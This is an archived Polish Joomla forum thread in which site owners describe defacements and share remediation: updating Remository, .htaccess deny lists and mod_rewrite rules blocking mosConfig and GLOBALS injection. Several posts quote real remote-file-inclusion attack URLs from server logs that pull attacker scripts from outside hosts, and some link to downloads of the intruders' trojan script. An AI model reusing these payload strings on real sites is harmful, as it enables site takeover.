PDA

Zobacz pełną wersję : We have been hacked! - Niewinnie ale zawsze - Info



piotr.uk
24-08-2006, 19:57
witam
jak w tytule. dobrali mi sie do serwisu. zostawie info to moze innym sie przyda zeby sobie dziury polatac.


OPIS
kilka dni temu, wieczorem, pracowalem nad serwisem. przy okazji odswiezenia strony w pewnej chwili pokazalo mi sie cos dziwnego. kilka linijek tekstu. bezwiednie to zignorowalem nawet nie czytajac co tam napisane. kolejne odswiezenie i dokladnie to sam. co jest? wklepanie z palca adresu podstrony - to samo... dopiero po kilku sekundach zrozumialem co jest grane.


SKUTKI
nasz serwis http://southampton.info.pl (http://southampton.info.pl/) zostal zaatakowany. jak sie okazalo niewinnie i 'ofiar w ludziach' nie bylo ale sam fakt dawal do myslenia. padlismy ofiara ataku typu H czyli 'homepage defacement' (podmiana strony glownej). wykorzystano fakt braku deklaracji w pliku .htaccess domyslnego rozszerzenia pliku 'index'. na serwer wyslany zostal plik index.htm ktory w tym przypadku wzial gore nad joomlowym index.php (przy braku wspomnianej deklaracji pliki index.html lub index.htm sa traktowane przez serwer Apache jako domyslne i wyswietlane 'przed' plikami index.php).

kopie podmienionej strony glownej zobaczycie tutaj:
http://southampton.info.pl/_index_hacked/index-hacked.htm

zainteresowani struktura pliku (zrodlem) zamiast 'podgladac' mog pobrac spakowany plik tutaj:
http://southampton.info.pl/_index_hacked/index-hacked.zip

po za podmiana strony glownej (ktora zreszta wyswietlala sie rowniez na wszystkich adresach podstron i to wpisanych 'z palca' (ciekawe...) nie ponieslismy innych strat. nie skasowano lub podmieniono innych plikow. poniewaz 'bylem na stronie' w chwili ataku, nie trfal on dlugo. moze 5 minut. po tym czasie przywrocilem normalna funkcjonalnosc serwisu. jednak juz to 5 minut wystarczylo aby atak zostal zaliczony i odnotowany w statystykach grupy ktora nas zaatakowala.
nazywaja sie PadiSim Hack Team (http://www.zone-h.org/component/option,com_attacks/Itemid,43/filter_defacer,PadiSim%20Hack%20Team/) .
wlam do nas jest odnotowany w ich statystykach tutaj:
http://www.zone-h.org/index2.php?option=com_mirrorwrp&Itemid=43&id=4590309


SLEDZTWO....
....wykazalo ze hasla do ftp nie zostaly ruszone. uwazne wertowanie logow przynioslo skutki i oto co te fajfusy zostawily po sobie:
http://southampton.info.pl/_index_hacked/access-website_hack.log

atak trwal od 22:59:07 do 23:04:58.
o 23:02:14 odwiedzil nas skrypt z http://www.zone-h.org (http://www.zone-h.org/) ktory zaliczyl fajfusom wlam.

adresy IP zamieszane w hack:
85.102.201.9 - TurkTelekom / turcja (WHOIS TUTAJ (http://www.dnsstuff.com/tools/whois.ch?ip=85.102.201.9))
- pod tym adresem siedzial fajfus bezposrednio atakujacy strone
- adres jest juz notowany w bazie spam i abuse (czerowne pola w tabeli)
http://www.dnsstuff.com/tools/ip4r.ch?ip=85.102.201.9


85.103.232.27 - TurkTelekom / turcja (WHOIS TUTAJ (http://www.dnsstuff.com/tools/whois.ch?ip=85.103.232.27))
- ktos z tego adresu wszedl na strone glowna
- adres jest juz notowany w bazie spam i abuse (czerwone pola w tabeli)
http://www.dnsstuff.com/tools/ip4r.ch?ip=85.103.232.27

62.150.154.23 - kuwait (WHOISE TUTAJ (http://www.dnsstuff.com/tools/whois.ch?ip=62.150.154.23))
- z tego IP zostal wyslany adres mojej strony do
http://www.zone-h.org/component/option,com_attacks/Itemid,45/ w celu zaliczenia wlamu przez skrypt statystyk
- adres jest juz notowany w bazie spam i abuse (czerwone pola w tabeli)
http://www.dnsstuff.com/tools/ip4r.ch?ip=62.150.154.23

atakujacy wykorzystal skrypt zapisany do pliku tekstowego o nazwie 2Fc99.txt. plik ze skryptem jest (a raczej na chwile obecna byl) umieszczony pod adresem http://2fmectruy.by.ru (http://2fmectruy.by.ru/). adres IP tego serwera to 217.16.29.51 - rosja (WHOIS TUTAJ) (http://www.dnsstuff.com/tools/whois.ch?ip=217.16.29.51). serwer oczywiscie notowany w bazie spam i abuse (czerwone pola w tabeli) http://www.dnsstuff.com/tools/ip4r.ch?ip=217.16.29.51

osoby zainteresowane kodem zrodlowym skryptu ktory podmienil strone glowna (a raczej zostal wykorzystany do jej podmiany) moga go pobrac tutaj:
http://southampton.info.pl/_index_hacked/zrodlo_skryptu_wykorzystujacego_luke_w_Remository3 .25.zip
zamieszczam go bo moze pomoc to koderom w lepszym poznaniu metod wlamu i pisaniu szczelniejszego kodu.

UWAGA: w pliku .zip znajduje sie spakowany dokument Worda z kodem zrodlowym skryptu. w TAKIEJ POSTACI skrypt NIE JEST AKTYWNY i jest calkowicie BEZPIECZNY! prosze jednak NIE ZAPISYWAC tego dokumenty jako pliku tekstowego .txt. czynnosc taka AKTYWUJE kod i tworzy z pliku czynny plik trojana. zostaliscie ostrzezeni. bawicie sie tym plikiem na wlasna odpowiedzialnosc!

skrypt ten jest znany. wykorzystuje luke bezpieczenstwa w Remository 3.25. na forum projektu Remository znajdziecie wiecej informacji:
http://www.remository.com/component/option,com_mamboboard/func,view/catid,6/id,3657/#3657


PREWENCJA
wykorzystano luke w Remository 3.25. tak wiec update do nowej wersji Remository to pierwszy krok obrony.

jak widac hasla nie zostaly ruszone. zmienilem jednak i wzmocnilem sile wszystkich hasel na stronie, do ftp, panelu administracji kontem u ISP oraz panelu admina joomli. dodatkowo dostep do katalogu z logowaniem admina joomli zostal uszczelniony po przez ochrone http_auth czyli ochrone dostepu do katalogu po przez haslo. wiecej info tutaj:
http://php.benscom.com/manual/pl/features.http-auth.php

w pliku .htaccess zostaly dopisane:



#ustalenie 'kolejki waznosci' wyswietlania domyslnego pliku
#index w zaleznosci od rozszerzenia
DirectoryIndex index.php index.html index.htm



########## Begin - Blokowanie dostepu z adresow IP
#
<Files 403.shtml>
order allow,deny
allow from all
</Files>

# zone h - serwer zliczajacy statystyki wlaman
deny from .zone-h.org
deny from .zone-h.com
deny from 213.219.122
deny from 62.150.154.23

# cyber-warrior.org - serwer zliczajacy statystyki wlaman
deny from .cyber-warrior.org
deny from .cyber-security.org
deny from 80.237.211.8

#blokowanie dostepu z adresow IP
deny from 85.102.201.9
deny from 85.103.232.27
deny from 62.150.154.23
deny from 217.16.29.51
#

dodatkowo w tym samym pliku .htaccess dodalem:



########## poczatek - Rewrite rules - blokowanie niektorych
#znanych exploitow
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## koniec

polecam wszystkim uszczelnienie systemu i dodanie tych fragmentow do pliku .htaccess (uwaga: trzeci kod 'rewrite rules' nie dziala z plikami htaccess.txt).


PODSUMOWANIE
"....myjcie sie dziewczyny bo nie znacie dnia ani godziny...." :D
czyli badzcie czujni i nie zapominajcie ze kazdy z nas moze zostac obiektem ataku. aktualizacje komponentow i systemu rzecz swieta!

mam nadzieje ze moje wypociny pomoga innym w utrzymaniu ich serwisow 'on-line' hehe.

pozdro i THE END

xqleg
29-08-2006, 21:23
u mnie włamali się (dokładnie ta sama grupa) przez komponent PeopleBook. W logach odnotowałem coś takiego

/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://parit.org/0000-CMDS/cse.gif?&cmd=id a wejscie było z takiego IP: 200.189.60.253

oraz coś takiego

/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.fileupyours.com/files/27375/input?&cmd IP 202.95.135.234

Chris
20-10-2007, 22:19
Podnosze, bo sam dzisiaj zostalem ofiara metody na mosConfig ;(

Tym razem przez multithumb - folder greybox i jeden z tamtejszych plikow. Skasowalem ten folder (korzystam z innej metody wysw. zdjec) oraz dodalem podane wyzej linijki. Szkoda, ze dopiero teraz trafilem na ten temat ;|

kkafara
26-02-2008, 20:53
witam
mi również shackowano stronę, tylko że nie wiem, jak sprawdzić, kto to był, i jak się włamano. proszę o jakąś pomoc.
stronka: http://ulksgrabowka.ovh.org

inkos
26-02-2008, 21:36
witam
mi również shackowano stronę, tylko że nie wiem, jak sprawdzić, kto to był, i jak się włamano. proszę o jakąś pomoc.
stronka: http://ulksgrabowka.ovh.org
Czy Wasza strona była oparta o CMS Joomla? Jeśli tak to co to była za wersja i jakie komponenty mieliście zainstalowane.
Co do samego sprawdzenia kto to był i jak dokonał włamu głównie wystarczy przeglądnąć logi z serwera i wyciągnąć z nich odpowiednich wniosków. Z kontami płatnymi nie ma problemu (standardowa usługa) z bezpłatnymi jest inaczej niemniej jednak proponuję kontakt z administratorami ovh i poinformowaniem ich o tej sprawie. Czy odpowiedzą i czy podejmą jakieś kroki - niestety nie mam żadnych doświadczeń w tej sprawie gdyż nie korzystałem nigdy z ich usług.

kkafara
26-02-2008, 22:22
strona była oparta o Joomle w wersji 1.0.13 Stable
joomle instalowałem automatycznie przez serwer ovh
po wejściu na stronę było tylko coś takiego:



H4CKED BY X MAN
moje komponenty, moduły i boty:
http://www.vpx.pl/up/20080226/117024462636017c2b9ed071267ce787e9339b187084.jpg
http://www.vpx.pl/up/20080226/117026b55b68e94b896c98a044be0535eacbf8188791.jpg
http://www.vpx.pl/up/20080226/1170278e9b4ef798d7df24c53beba8fb45c4e5121744.jpg

- większość to standardowe, instalowane przez serwer.

inkos
26-02-2008, 22:50
strona była oparta o Joomle w wersji 1.0.13 Stable
joomle instalowałem automatycznie przez serwer ovh
Proponuje kontakt z administratorami ovh i opisanie całej sytuacji oraz prośbę o analize logów serwera i ewentualne wskazanie drogi ataku. To moze wskazać odpowiedź co byłą tą dziurą przez którą dostali się qrackerzy. Jeśli uzyskasz jakieś informacje to opublikuj je tutaj na forum.

Z dodatków miałeś tylko mXcomment reszta patrząc na screeny to standardowe elementy Joomla.

kkafara
27-02-2008, 12:50
do admina napisałem,
jeszcze pobrałem z serwera to co pozostawili po sobie włamywacze, (rozszerzenie .txt zmienione na .doc)
jeśli ktoś się na tym zna, to może z tego wyciągnie, kto to był.
http://rapidshare.com/files/95321909/files.rar (https://ssl.rapidshare.com/cgi-bin/collectorszone.cgi?savedfiles=1&forbiddenfiles=0)
był tam jeszcze jeden plik, ale nie dało się go pobrać. "orkutandu.txt"

inkos
27-02-2008, 14:07
do admina napisałem,
jeszcze pobrałem z serwera to co pozostawili po sobie włamywacze, (rozszerzenie .txt zmienione na .doc)
jeśli ktoś się na tym zna, to może z tego wyciągnie, kto to był.
https://ssl.rapidshare.com/cgi-bin/collectorszone.cgi?savedfiles=1&forbiddenfiles=0
był tam jeszcze jeden plik, ale nie dało się go pobrać. "orkutandu.txt"
Wstaw poprawnego linka do tego pliku albo daj go jako zalacznik do forum. W tej chwili jest on nieodstepny gdyz nie podales nam swojego hasla do rapidshare. :)

kkafara
27-02-2008, 15:00
link zmieniony.
http://rapidshare.com/files/95321909/files.rar
sorry za niedopatrzenie.
a od admina ovh dostałem niestety wiadomość: "Niestety nie udostępniamy logów."
może uda się coś wyciągnąć z tych plików.

pitush
13-05-2009, 12:50
Witam,

sam mam chyba problem z tym mosConfig. Poinformowano mnie, że zablokowano dostęp do strony bo wykonywany był hidden perl script:


Napotkany problem: Hidden PERL script
Wykonywana komenda: /sbin/klogd -c 1 -x -x
Uruchomiony plik: /usr/bin/perl
Czas operacji: Tue May 12 16:05:13 CEST 2009
logi pokazują takie coś:

216.246.55.235 www.pieczatkarnia.pl - [12/May/2009:16:04:38 +0200] "GET /sklep//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=h ttp://www.angelcitytrading.com/css/gspreads.txt??&modez=botz HTTP/1.1" 500 551 "-" "Mozilla/5.0"
216.246.55.235 www.pieczatkarnia.pl - [12/May/2009:16:04:38 +0200] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=h ttp://www.angelcitytrading.com/css/gspreads.txt??&modez=botz HTTP/1.1" 500 551 "-" "Mozilla/5.0"oraz jeszcze kilka takich linii po czym nastąpiła blokada ze strony operatora.

Przyznam, że trochę mnie to przerasta, miałem to samo kilka dni temu, wykasowałem całą stronę z serwera, wgrałem kopię, ale nie minął tydzień i mam to samo.
Wygląda na to, że jakoweś skrypty wykonują się zdalnie, za pomocą


show_image_in_imgtag.php?mosConfig_absolute_path

mam zainstalowana najnowszą joomlę z virtuemart a ta funkcja show_image_in_imgtag.php to jest w virtuemart, więc mam ja skasować? Bo żadnej nowszej wersji nigdzie nie ma?

steelfox
13-05-2009, 16:48
wyłącz obie linie które pokazujesz w logu i zobacz co będzie się działo (zaznacz je jako komentarz)

pitush
14-05-2009, 11:41
Witam,

co mam wyłączyć, te 2 linie są w logu, pokazują co było wykonywane i jak. Jedyne co mogę wyłączyć to funkcję show_image_in_imgtag.php ale wtedy jakaś funkcja w sklepie przestanie funkcjonować. No i pytanie czy tylko ta funkcja będzie podatna na ten atak czy jakas inna w której można podstawić MosConfig_absolute_patch - i jak temu zapobiec?

steelfox
14-05-2009, 11:58
1 - jeśli jeszcze nie masz to aktualizuj joomlę do najnowszej wersji.
2 - kolejne zadanie dla Ciebie to lektura dzialu "sprawy bezpieczeństwa Joomla".
3 - wiesz skąd to przyszło, zablokuj więc ten adres.
4 - przeczytaj może coś na ten temat ma wydawca virtualmart'a
5 - jeśli nie pomogło to czekaj na następną łatkę, a wcześniej zgłoś to na
www.joomla.org